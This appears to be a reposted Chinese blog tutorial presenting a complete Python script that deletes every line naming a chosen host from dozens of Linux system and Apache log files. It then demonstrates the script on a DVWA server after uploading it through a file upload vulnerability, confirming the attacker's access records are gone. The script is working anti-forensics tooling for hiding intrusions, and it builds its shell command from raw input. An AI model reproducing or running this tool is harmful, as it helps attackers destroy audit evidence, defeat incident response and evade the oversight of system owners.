Python安全小工具之Linux日志痕迹清除
来源:互联网 发布:淘宝运费模板怎么看 编辑:程序博客网 时间:2024/05/19 12:16
主要过程为定义一个log列表,含有Linux中常见的log文件,然后使用os库的path.exists()方法查看是否存在该文件,若存在则使用subprocess库调用sed命令来删除日志中与指定host相关的行以实现痕迹的清除。
先来看看Linux中sed命令的使用:
其中‘/127.0.0.1/d’中,d是指定进行删除操作,删除的内容为含有“127.0.0.1”的行,而sed命令的-i参数表示可以直接修改文件内容。确实可以看到,含有“127.0.0.1”字样的行都被删除掉了。
脚本如下:
#coding=utf-8import osimport sysimport subprocessdef Clear_The_Log(host):logs = ["/var/log/messages","/var/log/messages.1","/etc/syslog.conf","/var/log/secure","/var/log/message","/var/log/lastlog","/var/log/auth.log","/var/log/vsftpd.log","/var/log/apache2/access.log","/var/log/apache2/error.log","/var/log/apache2/error.log.1","/usr/local/httpd/error.log","/apache/apache/message.log","/var/log/apache2/access_log","/var/log/apache2/error.log","/var/log/apache2/error_log ","/var/log/apache/access.log","/var/log/apache/access_log","/var/log/apache/error.log","/var/log/apache/error_log","/var/www/logs/error_log"," /var/www/logs/error.log"," /var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log"," /usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/usr/local/apache/logs/error_logerror_log.old","/usr/local/apache/logs/access_logaccess_log.old","/var/log/access.log","/var/log/access_log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access.log","/var/log/messages.1","/var/log/messages.2","/var/log/messages.3","/var/log/messages.4","/var/log/secure.1","/var/log/secure.2","/var/log/secure.3","/var/log/secure.3","/var/log/secure.4"]print "[*]Trying to find the logs of the Linux......"for log in logs:if os.path.exists(log):print "[+]Found the log: " + logsubprocess.call("sed -i '/%s/d' %s" % (host, log), shell=True)print "[+]Clear the log successfully."def main():try:host = sys.argv[1]if len(sys.argv) < 1:print "[*]Usage: python Linux_log_clear.py [host]\n Example: python Linux_log_clear.py 127.0.0.1"Clear_The_Log(host)except Exception, e:print "[*]Usage: python Linux_log_clear.py [host]\n Example: python Linux_log_clear.py 127.0.0.1"if __name__ == '__main__':main()
先在BT5上测试:
接着到DVWA的Web服务器上测试:
查看DVWA的Apache的access.log日志,找到物理机访问的记录:
命令:vim /var/log/apache2/access.log
然后使用输入该vim指令查找即可:/192.168.220.1
可以看到物理机即192.168.220.1的Web访问记录。
接着上传脚本,如可借用文件上传漏洞,然后执行脚本:
可以看到,脚本找到了Apache的access.log日志并对其进行了清除。
接下来进行确认,同样是查看Apache的access.log日志文件:
vim /var/log/apache2/access.log
可以看到,找不到相关的信息,确实清除掉了192.168.220.1主机相应的Web访问记录,即日志痕迹清除成功。
阅读全文
0 0
- Python安全小工具之Linux日志痕迹清除
- Python安全小工具之日志分析识别AWVS扫描
- Python安全小工具之生成高精度字典
- Python安全小工具之计算文件Hash值
- Python安全小工具之Web目录扫描器
- python学习之小工具汇总
- 清除系统的小工具
- 清除svn/vss小工具
- Python 小工具集合
- [python] 用户名小工具
- python小工具
- Python 内置小工具
- python 小工具总结
- python小工具
- [ios]安全攻防之代码混淆的一个小工具
- 无线安全Android小工具
- linux 实用小工具
- linux小工具分享
- break和continue的区别和重点
- java多线程设计模式之Producer-Consumer模式(二)
- 华为命令配置专题
- Spring Aop(十五)——Aop原理之Advised接口
- fis3 的安装过程
- Python安全小工具之Linux日志痕迹清除
- ubuntu 安装mysql
- 以太网ethernet MAC RGMII的一点总结
- 利用XSS获取cookie
- 常见编程异常及处理
- Redis基本操作——List
- Ubuntu自定义gedit外部工具编译、连接C文件
- 指针、内存与对象的指针成员
- 数据到手了,第一件事先干啥?| 说人话的统计学